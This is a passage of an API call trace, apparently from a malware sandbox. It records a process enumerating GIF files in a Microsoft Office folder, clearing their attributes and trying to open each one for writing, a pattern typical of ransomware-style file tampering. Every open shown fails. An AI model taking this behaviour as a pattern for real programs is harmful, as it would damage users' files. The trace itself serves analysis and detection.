lpFindFileData=0x29ac2e0) returned 1 [0136.414] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR18F.GIF", dwFileAttributes=0x80) returned 0 [0136.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR18F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir18f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.415] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.415] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.415] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.415] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.415] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR19F.GIF", dwFileAttributes=0x80) returned 0 [0136.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR19F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir19f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.415] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.416] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.416] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.416] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.416] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR1B.GIF", dwFileAttributes=0x80) returned 0 [0136.416] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR1B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir1b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.416] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.416] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.416] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.416] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.417] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR1F.GIF", dwFileAttributes=0x80) returned 0 [0136.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR1F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir1f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.418] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.418] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.418] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.418] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.418] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR20F.GIF", dwFileAttributes=0x80) returned 0 [0136.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR20F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir20f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.418] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.418] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.419] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.419] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR21F.GIF", dwFileAttributes=0x80) returned 0 [0136.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR21F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir21f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.419] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.419] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.419] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.419] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.420] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR22F.GIF", dwFileAttributes=0x80) returned 0 [0136.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR22F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir22f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.421] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.421] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.421] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.421] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.421] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR23F.GIF", dwFileAttributes=0x80) returned 0 [0136.421] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR23F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir23f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.422] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.422] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.422] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.422] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.422] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR24F.GIF", dwFileAttributes=0x80) returned 0 [0136.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR24F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir24f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.422] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.422] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.423] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.423] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR25F.GIF", dwFileAttributes=0x80) returned 0 [0136.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR25F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir25f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.423] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.423] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.423] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.423] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.424] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR26F.GIF", dwFileAttributes=0x80) returned 0 [0136.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR26F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir26f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.425] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.425] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.425] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.425] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.425] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR27F.GIF", dwFileAttributes=0x80) returned 0 [0136.425] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR27F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir27f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.425] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.425] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.426] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.426] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR28F.GIF", dwFileAttributes=0x80) returned 0 [0136.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR28F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir28f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.427] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.427] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.427] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.427] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.427] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR29F.GIF", dwFileAttributes=0x80) returned 0 [0136.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR29F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir29f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.428] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.428] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.428] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.428] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.428] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR2B.GIF", dwFileAttributes=0x80) returned 0 [0136.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR2B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir2b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.429] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.429] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.429] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.429] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR2F.GIF", dwFileAttributes=0x80) returned 0 [0136.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR2F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir2f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.430] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.430] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.430] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.430] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.430] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR30F.GIF", dwFileAttributes=0x80) returned 0 [0136.430] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR30F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir30f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.430] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.431] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.431] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.431] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.431] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR31F.GIF", dwFileAttributes=0x80) returned 0 [0136.431] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR31F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir31f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.431] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.431] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.431] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.431] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.432] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR32F.GIF", dwFileAttributes=0x80) returned 0 [0136.432] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR32F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir32f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.433] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.433] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.433] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.433] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.433] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR33F.GIF", dwFileAttributes=0x80) returned 0 [0136.433] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR33F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir33f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.433] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.433] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.434] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.434] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.434] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR34F.GIF", dwFileAttributes=0x80) returned 0 [0136.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR34F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir34f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.434] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.434] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.434] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.434] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR35F.GIF", dwFileAttributes=0x80) returned 0 [0136.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR35F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir35f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.435] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.435] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.435] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.435] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.435] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR36F.GIF", dwFileAttributes=0x80) returned 0 [0136.436] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR36F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir36f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.436] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.437] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.437] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.437] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR37F.GIF", dwFileAttributes=0x80) returned 0 [0136.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR37F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir37f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.437] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.437] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.437] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.437] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.438] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR38F.GIF", dwFileAttributes=0x80) returned 0 [0136.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR38F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir38f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.438] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.438] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.438] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.438] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.438] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR39F.GIF", dwFileAttributes=0x80) returned 0 [0136.438] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR39F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir39f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.439] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.439] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.439] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.439] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR3B.GIF", dwFileAttributes=0x80) returned 0 [0136.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR3B.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir3b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.440] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.440] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.440] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.440] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.440] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR3F.GIF", dwFileAttributes=0x80) returned 0 [0136.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR3F.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\pubspapr\\zpdir3f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.441] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.441] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.441] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0136.441] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PUBSPAPR\\ZPDIR40F.GIF", dwFileAttributes=0x80) returned 0 [0136.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 